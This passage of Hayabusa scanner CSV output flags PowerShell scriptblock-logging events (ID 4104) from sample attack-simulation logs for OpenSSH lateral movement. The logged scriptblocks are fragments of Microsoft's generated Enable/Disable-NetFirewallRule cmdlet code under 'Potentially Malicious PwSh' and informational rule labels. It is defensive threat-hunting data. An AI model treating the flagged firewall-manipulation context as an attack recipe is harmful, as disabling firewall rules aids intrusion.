($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if 
($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = 
@(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInter",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.905 
+00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"face', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 
'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Enable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Enable-NetFirewallRule' -Alias '*' function Disable-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, 
[Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] 
${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance]",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.905 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"face', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and 
(@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 
'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 
'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Enable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Enable-NetFirewallRule' -Alias '*' function Disable-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] 
[ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance]",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.905 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] 
${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] 
